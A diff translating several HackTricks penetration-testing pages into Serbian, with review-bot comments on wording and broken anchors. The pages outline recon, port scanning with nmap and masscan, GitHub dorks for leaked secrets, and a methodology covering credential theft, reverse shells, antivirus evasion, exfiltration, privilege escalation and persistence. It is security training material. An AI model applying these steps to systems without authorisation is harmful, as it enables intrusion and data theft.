-**Depending on the language** there are different **tools** you can use: +**U zavisnosti od jezika**, postoje različiti **alati** koje možete koristiti: {{#ref}} ../../network-services-pentesting/pentesting-web/code-review-tools.md {{#endref}} -There are also free services that allow you to **scan public repositories**, such as: +Takođe postoje besplatne usluge koje vam omogućavaju da **skenirate javne repozitorijume**, kao što su: - [**Snyk**](https://app.snyk.io/) -## [**Pentesting Web Methodology**](../../network-services-pentesting/pentesting-web/) +## [**Pentesting Web Metodologija**](../../network-services-pentesting/pentesting-web/) -The **majority of the vulnerabilities** found by bug hunters resides inside **web applications**, so at this point I would like to talk about a **web application testing methodology**, and you can [**find this information here**](../../network-services-pentesting/pentesting-web/). +**Većina ranjivosti** koje pronalaze lovci na greške se nalazi unutar **web aplikacija**, tako da bih u ovom trenutku želeo da govorim o **metodologiji testiranja web aplikacija**, a možete [**pronaći ove informacije ovde**](../../network-services-pentesting/pentesting-web/). -I also want to do a special mention to the section [**Web Automated Scanners open source tools**](../../network-services-pentesting/pentesting-web/#automatic-scanners), as, if you shouldn't expect them to find you very sensitive vulnerabilities, they come handy to implement them on **workflows to have some initial web information.** +Takođe želim da posebno pomenem sekciju [**Web Automatski Skenere open source alati**](../../network-services-pentesting/pentesting-web/#automatic-scanners), jer, ako ne biste trebali očekivati da pronađu veoma osetljive ranjivosti, oni su korisni za implementaciju u **tokove rada kako bi imali neke inicijalne web informacije.** -## Recapitulation +## Rekapitulacija -> Congratulations! 
At this point you have already perform **all the basic enumeration**. Yes, it's basic because a lot more enumeration can be done (will see more tricks later). +> Čestitamo! U ovom trenutku ste već izvršili **sve osnovne enumeracije**. Da, to je osnovno jer se može uraditi mnogo više enumeracija (videćemo više trikova kasnije). -So you have already: +Dakle, već ste: -1. Found all the **companies** inside the scope -2. Found all the **assets** belonging to the companies (and perform some vuln scan if in scope) -3. Found all the **domains** belonging to the companies -4. Found all the **subdomains** of the domains (any subdomain takeover?) -5. Found all the **IPs** (from and **not from CDNs**) inside the scope. -6. Found all the **web servers** and took a **screenshot** of them (anything weird worth a deeper look?) -7. Found all the **potential public cloud assets** belonging to the company. -8. **Emails**, **credentials leaks**, and **secret leaks** that could give you a **big win very easily**. -9. **Pentesting all the webs you found** +1. Pronašli sve **kompanije** unutar opsega +2. Pronašli sve **resurse** koji pripadaju kompanijama (i izvršili neku skeniranje ranjivosti ako je u opsegu) +3. Pronašli sve **domen** koji pripadaju kompanijama +4. Pronašli sve **poddomen** domena (ima li preuzimanja poddomena?) +5. Pronašli sve **IP-ove** (iz i **ne iz CDN-a**) unutar opsega. +6. Pronašli sve **web servere** i napravili **screenshot** njih (ima li nešto čudno što vredi dubljeg pregleda?) +7. Pronašli sve **potencijalne javne cloud resurse** koji pripadaju kompaniji. +8. **Emailovi**, **curenje akreditiva**, i **curenje tajni** koji bi vam mogli dati **veliku pobedu vrlo lako**. +9. **Pentesting svih web stranica koje ste pronašli** -## **Full Recon Automatic Tools** +## **Potpuni Automatski Alati za Recon** -There are several tools out there that will perform part of the proposed actions against a given scope. 
+Postoji nekoliko alata koji će izvršiti deo predloženih akcija protiv datog opsega. - [**https://github.com/yogeshojha/rengine**](https://github.com/yogeshojha/rengine) - [**https://github.com/j3ssie/Osmedeus**](https://github.com/j3ssie/Osmedeus) - [**https://github.com/six2dez/reconftw**](https://github.com/six2dez/reconftw) -- [**https://github.com/hackerspider1/EchoPwn**](https://github.com/hackerspider1/EchoPwn) - A little old and not updated +- [**https://github.com/hackerspider1/EchoPwn**](https://github.com/hackerspider1/EchoPwn) - Malo star i nije ažuriran -## **References** +## **Reference** -- All free courses of [**@Jhaddix**](https://twitter.com/Jhaddix) like [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI) - -
- -If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). - -{% embed url="https://www.stmcyber.com/careers" %} +- Svi besplatni kursevi [**@Jhaddix**](https://twitter.com/Jhaddix) kao što je [**Metodologija lovca na greške v4.0 - Recon izdanje**](https://www.youtube.com/watch?v=p4JgIu1mceI) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md b/src/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md index 53e1f35e6..6512c4eac 100644 --- a/src/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md +++ b/src/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md @@ -2,18 +2,15 @@ {{#include ../../banners/hacktricks-training.md}} -\ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! -{% embed url="https://go.intigriti.com/hacktricks" %} -Now that we have built the list of assets of our scope it's time to search for some OSINT low-hanging fruits. +Sada kada smo sastavili listu resursa našeg opsega, vreme je da potražimo neke OSINT niske plodove. -### Platforms that already searched for leaks +### Platforme koje su već tražile leakove - [https://trufflesecurity.com/blog/introducing-forager/](https://trufflesecurity.com/blog/introducing-forager/) -### Api keys leaks in github +### Api ključevi leakovi u github-u - [https://github.com/dxa4481/truffleHog](https://github.com/dxa4481/truffleHog) - [https://github.com/gitleaks/gitleaks](https://github.com/gitleaks/gitleaks) 
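Review bot: several items in the translated recap list lose number agreement: "Pronašli sve **domen** koji pripadaju" and "Pronašli sve **poddomen** domena" need the plural ("domene", "poddomene"), and "izvršili neku skeniranje ranjivosti" should be "neko skeniranje". The clause "jer, ako ne biste trebali očekivati da pronađu veoma osetljive ranjivosti" is a word-for-word rendering of the already awkward English; "iako ne treba očekivati da će pronaći" expresses the concession the original intends. The link text "Web Automatski Skenere open source alati" is not grammatical Serbian; "open source alati za automatsko web skeniranje" keeps the same target. That target, `../../network-services-pentesting/pentesting-web/#automatic-scanners`, is a slug generated from an English heading, so if that page's headings get translated in this series the anchor will have to follow.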
@@ -28,7 +25,6 @@ Now that we have built the list of assets of our scope it's time to search for s - [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker) ### **Dorks** - ```bash ".mlab.com password" "access_key" @@ -310,5 +306,4 @@ GCP SECRET AWS SECRET "private" extension:pgp ``` - {{#include ../../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md b/src/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md index 55186e1f3..19ca7bb4f 100644 --- a/src/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md +++ b/src/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md 
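Review bot: the translated headings of github-leaked-secrets.md mix terminology: "Platforme koje su već tražile leakove" uses the anglicism "leakove" while the rest of the patch uses "curenje"/"curenja", and "Api ključevi leakovi u github-u" is ungrammatical; "Platforme koje su već pretražile curenja" and "Curenja API ključeva na GitHub-u" would be consistent. "OSINT niske plodove" is a literal rendering of "low-hanging fruits" that carries no meaning in Serbian; "lako dostupne OSINT nalaze" conveys the intent. The other two hunks in this file only drop blank lines around the Dorks fence and before the closing include, which mdBook renders identically.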
@@ -2,17 +2,17 @@ {{#include ../../banners/hacktricks-training.md}} -The goal of this page is to enumerate **platforms that allow to search for code** (literal or regex) in across thousands/millions of repos in one or more platforms. +Cilj ove stranice je da nabroji **platforme koje omogućavaju pretragu koda** (literalno ili regex) u hiljadama/milionima repozitorijuma na jednoj ili više platformi. -This helps in several occasions to **search for leaked information** or for **vulnerabilities** patterns. +Ovo pomaže u nekoliko slučajeva da **pronađete provale informacija** ili **uzorke ranjivosti**. -- [**SourceGraph**](https://sourcegraph.com/search): Search in millions of repos. There is a free version and an enterprise version (with 15 days free). It supports regexes. -- [**Github Search**](https://github.com/search): Search across Github. It supports regexes. - - Maybe it's also useful to check also [**Github Code Search**](https://cs.github.com/). -- [**Gitlab Advanced Search**](https://docs.gitlab.com/ee/user/search/advanced_search.html): Search across Gitlab projects. Support regexes. -- [**SearchCode**](https://searchcode.com/): Search code in millions of projects. +- [**SourceGraph**](https://sourcegraph.com/search): Pretražujte u milionima repozitorijuma. Postoji besplatna verzija i verzija za preduzeća (sa 15 dana besplatno). Podržava regex. +- [**Github Search**](https://github.com/search): Pretražujte po Github-u. Podržava regex. +- Možda je takođe korisno proveriti i [**Github Code Search**](https://cs.github.com/). +- [**Gitlab Advanced Search**](https://docs.gitlab.com/ee/user/search/advanced_search.html): Pretražujte po Gitlab projektima. Podržava regex. +- [**SearchCode**](https://searchcode.com/): Pretražujte kod u milionima projekata. > [!WARNING] -> When you look for leaks in a repo and run something like `git log -p` don't forget there might be **other branches with other commits** containing secrets! 
+> Kada tražite provale u repozitorijumu i pokrenete nešto poput `git log -p`, ne zaboravite da mogu postojati **druge grane sa drugim commit-ima** koje sadrže tajne! {{#include ../../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/pentesting-methodology.md b/src/generic-methodologies-and-resources/pentesting-methodology.md index ea6b7f6a7..42595efd5 100644 --- a/src/generic-methodologies-and-resources/pentesting-methodology.md +++ b/src/generic-methodologies-and-resources/pentesting-methodology.md @@ -1,146 +1,134 @@ -# Pentesting Methodology +# Pentesting Metodologija {{#include ../banners/hacktricks-training.md}} -
- -If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). - -{% embed url="https://www.stmcyber.com/careers" %} - -## Pentesting Methodology +## Pentesting Metodologija
-_Hacktricks logos designed by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._ +_Hacktricks logotipi dizajnirani od_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._ -### 0- Physical Attacks +### 0- Fizički napadi -Do you have **physical access** to the machine that you want to attack? You should read some [**tricks about physical attacks**](../hardware-physical-access/physical-attacks.md) and others about [**escaping from GUI applications**](../hardware-physical-access/escaping-from-gui-applications.md). +Da li imate **fizički pristup** mašini koju želite da napadnete? Trebalo bi da pročitate neke [**trikove o fizičkim napadima**](../hardware-physical-access/physical-attacks.md) i druge o [**bežanju iz GUI aplikacija**](../hardware-physical-access/escaping-from-gui-applications.md). -### 1 - [Discovering hosts inside the network ](pentesting-network/#discovering-hosts)/ [Discovering Assets of the company](external-recon-methodology/) +### 1 - [Otkriće hostova unutar mreže](pentesting-network/#discovering-hosts)/ [Otkriće imovine kompanije](external-recon-methodology/) -**Depending** if the **test** you are perform is an **internal or external test** you may be interested on finding **hosts inside the company network** (internal test) or **finding assets of the company on the internet** (external test). +**U zavisnosti** od toga da li je **test** koji sprovodite **interni ili eksterni test**, možda ćete biti zainteresovani za pronalaženje **hostova unutar mreže kompanije** (interni test) ili **pronalaženje imovine kompanije na internetu** (eksterni test). > [!NOTE] -> Note that if you are performing an external test, once you manage to obtain access to the internal network of the company you should re-start this guide. +> Imajte na umu da ako sprovodite eksterni test, kada uspete da dobijete pristup unutrašnjoj mreži kompanije, trebali biste ponovo započeti ovaj vodič. 
-### **2-** [**Having Fun with the network**](pentesting-network/) **(Internal)** +### **2-** [**Zabavljanje sa mrežom**](pentesting-network/) **(Interni)** -**This section only applies if you are performing an internal test.**\ -Before attacking a host maybe you prefer to **steal some credentials** **from the network** or **sniff** some **data** to learn **passively/actively(MitM)** what can you find inside the network. You can read [**Pentesting Network**](pentesting-network/#sniffing). +**Ova sekcija se primenjuje samo ako sprovodite interni test.**\ +Pre nego što napadnete host, možda biste želeli da **ukradete neke akreditive** **sa mreže** ili **snifujete** neke **podatke** kako biste pasivno/aktivno (MitM) saznali šta možete pronaći unutar mreže. Možete pročitati [**Pentesting Mrežu**](pentesting-network/#sniffing). -### 3- [Port Scan - Service discovery](pentesting-network/#scanning-hosts) +### 3- [Port skeniranje - Otkriće usluga](pentesting-network/#scanning-hosts) -The first thing to do when **looking for vulnerabilities in a host** is to know which **services are running** in which ports. Let's see the[ **basic tools to scan ports of hosts**](pentesting-network/#scanning-hosts). +Prva stvar koju treba uraditi kada **tražite ranjivosti na hostu** je da znate koje **usluge rade** na kojim portovima. Pogledajmo [**osnovne alate za skeniranje portova hostova**](pentesting-network/#scanning-hosts). -### **4-** [Searching service version exploits](../generic-hacking/search-exploits.md) +### **4-** [Pretraživanje eksploita verzija usluga](../generic-hacking/search-exploits.md) -Once you know which services are running, and maybe their version, you have to **search for known vulnerabilities**. Maybe you get lucky and there is a exploit to give you a shell... +Kada znate koje usluge rade, i možda njihovu verziju, morate **tražiti poznate ranjivosti**. Možda ćete imati sreće i postoji exploit koji će vam dati shell... 
-### **5-** Pentesting Services +### **5-** Pentesting Usluge -If there isn't any fancy exploit for any running service, you should look for **common misconfigurations in each service running.** +Ako ne postoji neki fancy exploit za bilo koju aktivnu uslugu, trebali biste potražiti **uobičajene greške u konfiguraciji svake aktivne usluge.** -**Inside this book you will find a guide to pentest the most common services** (and others that aren't so common)**. Please, search in the left index the** _**PENTESTING**_ **section** (the services are ordered by their default ports). +**Unutar ove knjige naći ćete vodič za pentestovanje najčešćih usluga** (i drugih koje nisu tako uobičajene)**. Molimo vas da potražite u levom indeksu** _**PENTESTING**_ **sekciju** (usluge su poređane po njihovim podrazumevanim portovima). -**I want to make a special mention of the** [**Pentesting Web**](../network-services-pentesting/pentesting-web/) **part (as it is the most extensive one).**\ -Also, a small guide on how to[ **find known vulnerabilities in software**](../generic-hacking/search-exploits.md) can be found here. +**Želim da napravim posebnu napomenu o** [**Pentestingu Web**](../network-services-pentesting/pentesting-web/) **delu (jer je to najopsežniji deo).**\ +Takođe, mali vodič o tome kako [**pronaći poznate ranjivosti u softveru**](../generic-hacking/search-exploits.md) može se naći ovde. -**If your service is not inside the index, search in Google** for other tutorials and **let me know if you want me to add it.** If you **can't find anything** in Google, perform your **own blind pentesting**, you could start by **connecting to the service, fuzzing it and reading the responses** (if any). 
+**Ako vaša usluga nije u indeksu, potražite na Google-u** za druge tutorijale i **javite mi ako želite da je dodam.** Ako **ne možete ništa pronaći** na Google-u, izvršite svoj **vlastiti slepi pentesting**, možete početi tako što ćete **povezati se na uslugu, fuzzovati je i čitati odgovore** (ako ih ima). -#### 5.1 Automatic Tools +#### 5.1 Automatski alati -There are also several tools that can perform **automatic vulnerabilities assessments**. **I would recommend you to try** [**Legion**](https://github.com/carlospolop/legion)**, which is the tool that I have created and it's based on the notes about pentesting services that you can find in this book.** +Postoji nekoliko alata koji mogu izvršiti **automatske procene ranjivosti**. **Preporučio bih vam da probate** [**Legion**](https://github.com/carlospolop/legion)**, koji je alat koji sam kreirao i zasniva se na beleškama o pentestovanju usluga koje možete pronaći u ovoj knjizi.** -#### **5.2 Brute-Forcing services** +#### **5.2 Brute-Forcing usluga** -In some scenarios a **Brute-Force** could be useful to **compromise** a **service**. [**Find here a CheatSheet of different services brute forcing**](../generic-hacking/brute-force.md)**.** +U nekim scenarijima **Brute-Force** može biti koristan za **kompromitovanje** **usluge**. [**Pronađite ovde CheatSheet različitih usluga brute forcing**](../generic-hacking/brute-force.md)**.** ### 6- [Phishing](phishing-methodology/) -If at this point you haven't found any interesting vulnerability you **may need to try some phishing** in order to get inside the network. You can read my phishing methodology [here](phishing-methodology/): +Ako do ovog trenutka niste pronašli nijednu zanimljivu ranjivost, **možda ćete morati da probate neki phishing** kako biste ušli u mrežu. 
Možete pročitati moju phishing metodologiju [ovde](phishing-methodology/): -### **7-** [**Getting Shell**](../generic-hacking/reverse-shells/) +### **7-** [**Dobijanje Shell-a**](../generic-hacking/reverse-shells/) -Somehow you should have found **some way to execute code** in the victim. Then, [a list of possible tools inside the system that you can use to get a reverse shell would be very useful](../generic-hacking/reverse-shells/). +Na neki način biste trebali pronaći **neki način da izvršite kod** na žrtvi. Tada bi [lista mogućih alata unutar sistema koje možete koristiti za dobijanje reverznog shell-a bila veoma korisna](../generic-hacking/reverse-shells/). -Specially in Windows you could need some help to **avoid antiviruses**: [**Check this page**](../windows-hardening/av-bypass.md)**.**\\ +Posebno na Windows-u mogli biste trebati neku pomoć da **izbegnete antiviruse**: [**Proverite ovu stranicu**](../windows-hardening/av-bypass.md)**.**\\ -### 8- Inside +### 8- Unutra -If you have troubles with the shell, you can find here a small **compilation of the most useful commands** for pentesters: +Ako imate problema sa shell-om, ovde možete pronaći malu **kompilaciju najkorisnijih komandi** za pentestere: - [**Linux**](../linux-hardening/useful-linux-commands.md) - [**Windows (CMD)**](../windows-hardening/basic-cmd-for-pentesters.md) - [**Windows (PS)**](../windows-hardening/basic-powershell-for-pentesters/) -### **9 -** [**Exfiltration**](../generic-hacking/exfiltration.md) +### **9 -** [**Ekstrakcija**](../generic-hacking/exfiltration.md) -You will probably need to **extract some data from the victim** or even **introduce something** (like privilege escalation scripts). **Here you have a** [**post about common tools that you can use with these purposes**](../generic-hacking/exfiltration.md)**.** +Verovatno ćete morati da **izvučete neke podatke iz žrtve** ili čak **uvedete nešto** (kao što su skripte za eskalaciju privilegija). 
**Ovde imate** [**post o uobičajenim alatima koje možete koristiti u te svrhe**](../generic-hacking/exfiltration.md)**.** -### **10- Privilege Escalation** +### **10- Eskalacija privilegija** -#### **10.1- Local Privesc** +#### **10.1- Lokalna Privesc** -If you are **not root/Administrator** inside the box, you should find a way to **escalate privileges.**\ -Here you can find a **guide to escalate privileges locally in** [**Linux**](../linux-hardening/privilege-escalation/) **and in** [**Windows**](../windows-hardening/windows-local-privilege-escalation/)**.**\ -You should also check this pages about how does **Windows work**: +Ako niste **root/Administrator** unutar mašine, trebali biste pronaći način da **escalirate privilegije.**\ +Ovde možete pronaći **vodič za eskalaciju privilegija lokalno u** [**Linux-u**](../linux-hardening/privilege-escalation/) **i u** [**Windows-u**](../windows-hardening/windows-local-privilege-escalation/)**.**\ +Trebalo bi takođe da proverite ove stranice o tome kako **Windows funkcioniše**: -- [**Authentication, Credentials, Token privileges and UAC**](../windows-hardening/authentication-credentials-uac-and-efs/) -- How does [**NTLM works**](../windows-hardening/ntlm/) -- How to [**steal credentials**](https://github.com/carlospolop/hacktricks/blob/master/generic-methodologies-and-resources/broken-reference/README.md) in Windows -- Some tricks about [_**Active Directory**_](../windows-hardening/active-directory-methodology/) +- [**Autentifikacija, Akreditivi, Token privilegije i UAC**](../windows-hardening/authentication-credentials-uac-and-efs/) +- Kako funkcioniše [**NTLM**](../windows-hardening/ntlm/) +- Kako [**ukrasti akreditive**](https://github.com/carlospolop/hacktricks/blob/master/generic-methodologies-and-resources/broken-reference/README.md) u Windows-u +- Neki trikovi o [_**Active Directory**_](../windows-hardening/active-directory-methodology/) -**Don't forget to checkout the best tools to enumerate Windows and Linux 
local Privilege Escalation paths:** [**Suite PEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) +**Ne zaboravite da proverite najbolje alate za enumeraciju Windows i Linux lokalnih putanja eskalacije privilegija:** [**Suite PEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) #### **10.2- Domain Privesc** -Here you can find a [**methodology explaining the most common actions to enumerate, escalate privileges and persist on an Active Directory**](../windows-hardening/active-directory-methodology/). Even if this is just a subsection of a section, this process could be **extremely delicate** on a Pentesting/Red Team assignment. +Ovde možete pronaći [**metodologiju koja objašnjava najčešće akcije za enumeraciju, eskalaciju privilegija i persistenciju na Active Directory**](../windows-hardening/active-directory-methodology/). Čak i ako je ovo samo podsekcija jedne sekcije, ovaj proces može biti **izuzetno delikatan** na Pentesting/Red Team zadatku. ### 11 - POST -#### **11**.1 - Looting +#### **11**.1 - Pljačka -Check if you can find more **passwords** inside the host or if you have **access to other machines** with the **privileges** of your **user**.\ -Find here different ways to [**dump passwords in Windows**](https://github.com/carlospolop/hacktricks/blob/master/generic-methodologies-and-resources/broken-reference/README.md). +Proverite da li možete pronaći više **lozinki** unutar hosta ili ako imate **pristup drugim mašinama** sa **privilegijama** vašeg **korisnika**.\ +Pronađite ovde različite načine za [**dumpovanje lozinki u Windows-u**](https://github.com/carlospolop/hacktricks/blob/master/generic-methodologies-and-resources/broken-reference/README.md). 
-#### 11.2 - Persistence +#### 11.2 - Persistencija -**Use 2 or 3 different types of persistence mechanism so you won't need to exploit the system again.**\ -**Here you can find some** [**persistence tricks on active directory**](../windows-hardening/active-directory-methodology/#persistence)**.** +**Koristite 2 ili 3 različita tipa mehanizama persistencije kako ne biste morali ponovo da eksploatišete sistem.**\ +**Ovde možete pronaći neke** [**trikove za persistenciju na Active Directory**](../windows-hardening/active-directory-methodology/#persistence)**.** -TODO: Complete persistence Post in Windows & Linux +TODO: Završiti persistenciju Post u Windows-u i Linux-u ### 12 - Pivoting -With the **gathered credentials** you could have access to other machines, or maybe you need to **discover and scan new hosts** (start the Pentesting Methodology again) inside new networks where your victim is connected.\ -In this case tunnelling could be necessary. Here you can find [**a post talking about tunnelling**](../generic-hacking/tunneling-and-port-forwarding.md).\ -You definitely should also check the post about [Active Directory pentesting Methodology](../windows-hardening/active-directory-methodology/). There you will find cool tricks to move laterally, escalate privileges and dump credentials.\ -Check also the page about [**NTLM**](../windows-hardening/ntlm/), it could be very useful to pivot on Windows environments.. +Sa **prikupljenim akreditivima** mogli biste imati pristup drugim mašinama, ili možda trebate **otkriti i skenirati nove hostove** (ponovo započeti Pentesting Metodologiju) unutar novih mreža na kojima je vaša žrtva povezana.\ +U ovom slučaju tunelovanje bi moglo biti neophodno. Ovde možete pronaći [**post o tunelovanju**](../generic-hacking/tunneling-and-port-forwarding.md).\ +Definitivno biste takođe trebali proveriti post o [metodologiji pentestovanja Active Directory](../windows-hardening/active-directory-methodology/). 
Tamo ćete pronaći sjajne trikove za lateralno kretanje, eskalaciju privilegija i dumpovanje akreditiva.\ +Proverite takođe stranicu o [**NTLM**](../windows-hardening/ntlm/), može biti veoma korisna za pivotovanje u Windows okruženjima. -### MORE +### VIŠE -#### [Android Applications](../mobile-pentesting/android-app-pentesting/) +#### [Android Aplikacije](../mobile-pentesting/android-app-pentesting/) -#### **Exploiting** +#### **Eksploatacija** -- [**Basic Linux Exploiting**](broken-reference/) -- [**Basic Windows Exploiting**](../binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md) -- [**Basic exploiting tools**](../binary-exploitation/basic-stack-binary-exploitation-methodology/tools/) +- [**Osnovna Linux Eksploatacija**](broken-reference/) +- [**Osnovna Windows Eksploatacija**](../binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md) +- [**Osnovni alati za eksploataciju**](../binary-exploitation/basic-stack-binary-exploitation-methodology/tools/) -#### [**Basic Python**](python/) +#### [**Osnovni Python**](python/) -#### **Crypto tricks** +#### **Crypto trikovi** - [**ECB**](../crypto-and-stego/electronic-code-book-ecb.md) - [**CBC-MAC**](../crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md) - [**Padding Oracle**](../crypto-and-stego/padding-oracle-priv.md) -
- -If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). - -{% embed url="https://www.stmcyber.com/careers" %} - {{#include ../banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/pentesting-network/README.md b/src/generic-methodologies-and-resources/pentesting-network/README.md index 1f4bb741f..fc60ec606 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/README.md +++ b/src/generic-methodologies-and-resources/pentesting-network/README.md 
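Review bot: the section 9 heading "Ekstrakcija" changes the meaning of "Exfiltration"; the established term is "Eksfiltracija", and the body text ("izvučete neke podatke iz žrtve") already describes exactly that. Similarly "11.1 - Pljačka" reads as robbery; "Prikupljanje plena (Looting)" or leaving "Looting" untranslated keeps the pentest sense. "escalirate privilegije" in 10.1 is a typo for "eskalirate". Headings 1 and 3 link to `pentesting-network/#discovering-hosts`, `pentesting-network/#scanning-hosts` and `pentesting-network/#sniffing`, slugs that mdBook derives from the English headings of pentesting-network/README.md, which this same patch translates (e.g. "Skenerisanje hostova"); either keep those headings in English, update the anchors, or give the headings explicit ids. The stray `\\` after "Proverite ovu stranicu**.**" is carried over from the original and renders as a literal backslash; worth dropping while the line is being rewritten. "Otkriće" is used for the noun in headings ("Otkriće hostova") while the body uses "otkrivanje"; "Otkrivanje hostova" is the usual wording for the process.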
@@ -2,83 +2,69 @@ {{#include ../../banners/hacktricks-training.md}} -\ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! -{% embed url="https://go.intigriti.com/hacktricks" %} -## Discovering hosts from the outside +## Otkriće hostova sa spoljašnje strane -This is going to be a **brief section** about how to find **IPs responding** from the **Internet**.\ -In this situation you have some **scope of IPs** (maybe even several **ranges**) and you just to find **which IPs are responding**. +Ovo će biti **kratka sekcija** o tome kako pronaći **IP adrese koje odgovaraju** sa **Interneta**.\ +U ovoj situaciji imate neki **opseg IP adresa** (možda čak i nekoliko **raspona**) i samo treba da pronađete **koje IP adrese odgovaraju**. ### ICMP -This is the **easiest** and **fastest** way to discover if a host is up or not.\ -You could try to send some **ICMP** packets and **expect responses**. The easiest way is just sending an **echo request** and expect from the response. You can do that using a simple `ping`or using `fping`for **ranges**.\ -You could also use **nmap** to send other types of ICMP packets (this will avoid filters to common ICMP echo request-response). - +Ovo je **najlakši** i **najbrži** način da otkrijete da li je host aktivan ili ne.\ +Možete pokušati da pošaljete neke **ICMP** pakete i **očekujete odgovore**. Najlakši način je jednostavno slanje **echo zahteva** i očekivanje odgovora. To možete uraditi koristeći jednostavan `ping` ili koristeći `fping` za **raspone**.\ +Takođe možete koristiti **nmap** da pošaljete druge tipove ICMP paketa (to će izbeći filtere za uobičajene ICMP echo zahtev-odgovor). 
```bash ping -c 1 199.66.11.4 # 1 echo request to a host fping -g 199.66.11.0/24 # Send echo requests to ranges nmap -PE -PM -PP -sn -n 199.66.11.0/24 #Send echo, timestamp requests and subnet mask requests ``` - ### TCP Port Discovery -It's very common to find that all kind of ICMP packets are being filtered. Then, all you can do to check if a host is up is **try to find open ports**. Each host has **65535 ports**, so, if you have a "big" scope you **cannot** test if **each port** of each host is open or not, that will take too much time.\ -Then, what you need is a **fast port scanner** ([masscan](https://github.com/robertdavidgraham/masscan)) and a list of the **ports more used:** - +Veoma je uobičajeno da se svi tipovi ICMP paketa filtriraju. Tada, sve što možete da uradite da proverite da li je host aktivan je **pokušati da pronađete otvorene portove**. Svaki host ima **65535 portova**, tako da, ako imate "veliki" opseg, **ne možete** testirati da li je **svaki port** svakog hosta otvoren ili ne, to će potrajati previše vremena.\ +Tada, ono što vam je potrebno je **brzi skener portova** ([masscan](https://github.com/robertdavidgraham/masscan)) i lista **najčešće korišćenih portova:** ```bash #Using masscan to scan top20ports of nmap in a /24 range (less than 5min) masscan -p20,21-23,25,53,80,110,111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 199.66.11.0/24 ``` - -You could also perform this step with `nmap`, but it slower and somewhat `nmap`has problems identifying hosts up. +Možete takođe izvršiti ovaj korak sa `nmap`, ali je sporije i `nmap` ima problema sa identifikovanjem aktivnih hostova. 
### HTTP Port Discovery -This is just a TCP port discovery useful when you want to **focus on discovering HTTP** **services**: - +Ovo je samo otkrivanje TCP portova korisno kada želite da **se fokusirate na otkrivanje HTTP** **usluga**: ```bash masscan -p80,443,8000-8100,8443 199.66.11.0/24 ``` +### Otkriće UDP Portova -### UDP Port Discovery - -You could also try to check for some **UDP port open** to decide if you should **pay more attention** to a **host.** As UDP services usually **don't respond** with **any data** to a regular empty UDP probe packet it is difficult to say if a port is being filtered or open. The easiest way to decide this is to send a packet related to the running service, and as you don't know which service is running, you should try the most probable based on the port number: - +Možete takođe pokušati da proverite da li je neki **UDP port otvoren** kako biste odlučili da li treba da **obratite više pažnje** na **host.** Pošto UDP usluge obično **ne odgovaraju** sa **bilo kojim podacima** na običan prazan UDP probni paket, teško je reći da li je port filtriran ili otvoren. Najlakši način da to odlučite je da pošaljete paket vezan za aktivnu uslugu, a pošto ne znate koja usluga radi, trebali biste probati najverovatniju na osnovu broja porta: ```bash nmap -sU -sV --version-intensity 0 -F -n 199.66.11.53/24 # The -sV will make nmap test each possible known UDP service packet # The "--version-intensity 0" will make nmap only test the most probable ``` - -The nmap line proposed before will test the **top 1000 UDP ports** in every host inside the **/24** range but even only this will take **>20min**. 
If need **fastest results** you can use [**udp-proto-scanner**](https://github.com/portcullislabs/udp-proto-scanner): `./udp-proto-scanner.pl 199.66.11.53/24` This will send these **UDP probes** to their **expected port** (for a /24 range this will just take 1 min): _DNSStatusRequest, DNSVersionBindReq, NBTStat, NTPRequest, RPCCheck, SNMPv3GetRequest, chargen, citrix, daytime, db2, echo, gtpv1, ike,ms-sql, ms-sql-slam, netop, ntp, rpc, snmp-public, systat, tftp, time, xdmcp._ +Predložena nmap linija će testirati **top 1000 UDP portova** na svakom hostu unutar **/24** opsega, ali čak i to će trajati **>20min**. Ako su potrebni **najbrži rezultati**, možete koristiti [**udp-proto-scanner**](https://github.com/portcullislabs/udp-proto-scanner): `./udp-proto-scanner.pl 199.66.11.53/24`. Ovo će poslati ove **UDP probe** na njihov **očekivani port** (za /24 opseg ovo će trajati samo 1 min): _DNSStatusRequest, DNSVersionBindReq, NBTStat, NTPRequest, RPCCheck, SNMPv3GetRequest, chargen, citrix, daytime, db2, echo, gtpv1, ike, ms-sql, ms-sql-slam, netop, ntp, rpc, snmp-public, systat, tftp, time, xdmcp._ ### SCTP Port Discovery - ```bash #Probably useless, but it's pretty fast, why not try it? nmap -T4 -sY -n --open -Pn ``` - ## Pentesting Wifi -Here you can find a nice guide of all the well known Wifi attacks at the time of the writing: +Ovde možete pronaći dobar vodič o svim poznatim Wifi napadima u vreme pisanja: {{#ref}} ../pentesting-wifi/ {{#endref}} -## Discovering hosts from the inside +## Otkriće hostova iznutra -If you are inside the network one of the first things you will want to do is 